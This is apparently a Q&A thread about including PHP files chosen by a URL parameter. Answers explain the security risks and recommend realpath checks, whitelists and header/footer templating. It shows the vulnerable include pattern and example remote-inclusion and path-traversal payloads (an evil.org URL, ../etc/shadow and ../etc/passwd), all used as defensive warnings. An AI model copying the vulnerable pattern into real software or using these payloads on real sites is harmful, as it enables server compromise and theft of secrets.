# How to make filename include variable depending on $_GET php

Tags: php

To include php code in a file we do:

```
    <html>
    <body>


    <h1>Welcome to my home page!</h1>

    <p>Some text.</p>
   <?php include 'body.php'; ?>    
    </body>
    </html>
```

Now I would like to include a file, the name will be passed in the url, so for example I wouldc do `www.site.com/file.php?name_of_file_to_include=body` to load body.php in the file:

```
<html>
<body>

<h1>Welcome to my home page!</h1>
<p>Some text.</p>
<? 
$file=$_GET["name_of_file_to_include"];
include $file.'.php'; 
?>
</body>
</html>
```

Is this possible or Is it a better option to do this thing. The purpose to do so is because I will change only a part of the file, but there are lots of files I want to load

Comment: Yes, it's possible and depending on how many files you are loading there may be a better way to do that.  Are you doing this for any particular reason?  Usually it's the other way around.  You will have page.php that includes the header

Comment: Note: if you do go this route, make sure the php.ini setting `allow_url_include` is disabled.  Otherwise, an attacker could specify a file on a remote server to be executed on yours.

Comment: @GigaWatt I was just about to ask how to avoid that in a production setting. Thanks... This seemed like a far too easy way to execute malicious code.

Comment: Yes I have Many files with different things, but the base should be the same for all

Answer (score 2, accepted):

It is possible of course. I would make sure, that `$_GET["name_of_file_to_include"]` **does not contain a remote url. Otherewise your script is higly vulnerable against remote script injection.

Imagine the attacke prepares an url like :

```
index.php?name_of_the_file_to_include=http://evil.org/my
```

On his server he has stored a file named `my.php`:

```
foreach(get_defined_vars() as $var) {
    var_dump($var);
}
```

This script would run directly in the context of your application and would the let see your db config and so on.

So make sure that you prepend at least a path before the include to prevent form remote script injection. Like this:

```
include './' . $file.'.php';
```

However this isn't safe enough as the attacker will still being able to execute code that is already on your system. Maybe a php file which is otherwise restricted. So you should make sure that the path is insight your content folder:

```
// realpath will remove all '/..' from path:
$path = realpath('./sites/' . $_GET['file_to_include'] . '.php');

// if the file does not exists realpath returns false
if(!$path) {
    die('error');
}

// check if the path starts exactly with your site path
if(strpos($path, realpath('./sites')) !== 0) {
    die('error');
}

// we are safe now:
include $path;
```

Comment: Prefixing the input with `./` won't help if `$file` contains `../`.  An attacker could still use something like `../../../../../etc/shadow%00`

Comment: Yes I wrote *at least*. As it will prevent from remote file inclusion. There are several other checks to do, of course. But note that the /etc/shadow will not being parsed as php. But what if a test file still resides in otherwise restricted folder ;)

Answer (score 2):

You can do it exactly like you are showing... but you shouldn't

include will include anything and parse out php and show everything else, this makes it so that anyone can get at anything on your system that's accessible to the webserver.

Imagine if you had a database_config.ini right outside of the webroot (you put it there so no one on the web can see what your database password is.)

i could slug in `http://www.yoursite.com/file.php?name_of_file_to_include=../database_config.ini` and now I know how to access your database.

A better approach for this problem is to create a whitelist of pages and include files

```
 $pages = array(
     "body"="body.php",
     "aboutme"=>"aboutme.php"
 );
```

and then use:

```
 $page = $_GET["name_of_file_to_include"];
 if (array_key_exists($page, $pages)){
     include ($pages[$page]);
 }
```

Comment: Good example with the whitelisting. I use this approach for making one-off sites with a controller index file :)

Comment: Whitelisting isn't that good for a modular application design

Comment: @hek2mgl true but I guess the end of the day is never trust anything from userland without first verifying it against a trusted source, whitelisting is just the simplest implementation of that concept.

Comment: However, I don't like it so much. It will get messy in larger applications and there are more elegant ways to do it. But of course a whitelist can be populated dynamically as well :)

Comment: I guess I wouldn't have a lot of issue with including a known file from a known location based on url slug or parameter ... along the lines of `include("./modules/".basename($_GET["module"].".php");`

Answer (score 1):

Yes! But be sure to specify the base path using

```
__DIR__
```

as such:

```
    //Include the requested file
    $file = __DIR__ . $_GET['file_name'] . ".php";
    if(file_exists($file ))
        include($file);
```

Comment: prefixing with base path will still note side step the request structured like `name_of_file_to_include=../../../../etc/passwd`

Comment: Which is why I upvoted your answer- cuz I left that out :) I usually whitelist as well, but didn't include it in this example. Cheers!

Answer (score 1):

It is possible, but opens up a massive security hole.

Just imagine if someone were to request `www.site.com/file.php?name_of_file_to_include=/root/secret_password_file` (assuming you store your important data in `secret_password_file.php` in `/root`).

It sounds like you want some form of templating system. There are many ways this can be achieved—some more sophisticated than others. Probably the simplest approach for you would be to forget about including the page content; instead, consider including the header and footer into the content pages.

Imagine `header.php` looks like:

```
<html>
<body>

<h1>Welcome to my home page!</h1>
<p>Some text.</p>
```

and `footer.php` looks like:

```
</body>
</html>
```

Now you can include them both into every content page. For example, `body.php` might look like:

```
<?php
include 'header.php';

<div>
... content here ...
</div>

include 'footer.php';
```

This achieves the same effect, without allowing random web users to request any file from your server.

Answer (score 1):

As my comment stated, I would do it the opposite way.  Make your header information within a file that you include into all of your pages.  How I've done it (And how all templators do it) is simple:

Have a header.php stored somewhere on your server which contains everything in the header excluding the `</head>` tag.  This way, you can include this file into any page and still add link relations and scripts.  For example, this would be an index.php or something like that.

```
<?PHP
    include("folder/header.php");
?>
<!-- ADD ADDITIONAL SCRIPTS AND STYLES HERE -->
<!-- END ADDITIONAL STUFF -->
<title></title>
</head>
<body>
<!-- YOUR CONTENT HERE -->
</body>
</html>
```

This way, you have the same formatted pieces (Like your header or any other pieces) and the URL would be something like www.domain.com/index.php or www.domain.com/page.php.  You are also avoiding the **SECURITY RISK** of "Getting" a file